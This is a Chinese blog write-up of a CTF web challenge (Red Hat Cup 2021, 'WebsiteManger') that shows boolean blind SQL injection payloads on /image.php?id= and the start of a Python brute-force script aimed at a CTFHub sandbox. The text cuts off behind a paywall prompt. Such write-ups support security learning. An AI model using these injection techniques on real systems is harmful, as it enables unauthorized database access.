CTFHub_2021-第四届红帽杯网络安全大赛-Web-WebsiteManger

最新推荐文章于 2022-07-20 00:44:40 发布

swpu_jx_1998

最新推荐文章于 2022-07-20 00:44:40 发布

阅读量1.9k

点赞数 1

分类专栏： CTFHUB 文章标签：经验分享 web安全

本文链接：https://blog.youkuaiyun.com/weixin_40872714/article/details/123743827

版权

CTFHub_2021-第四届红帽杯网络安全大赛-Web-WebsiteManger（布尔盲注、SSRF ）

场景描述：最新的网站测试器，作为非站长的你，能利用好它的功能吗？

场景打开后，如下，是个登录框
在这里插入图片描述
查看源码，发现可能的注入点 /image.php?id=2

布尔盲注

/image.php?id=if(1=1,1,5) True
/image.php?id=if(1=2,1,5) False
条件为真时?id=1，回显第一张图片，条件为假时?id=5，没有id=5的图片，什么都没有。即可作为布尔盲注判断条件

from requests import *

allstr = '123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\]^_`{|}~'

myurl = 'http://challenge-a26d398b5f986b54.sandbox.ctfhub.com:10800/image.php'

info = ''
for i in range(1, 50)

最低0.47元/天解锁文章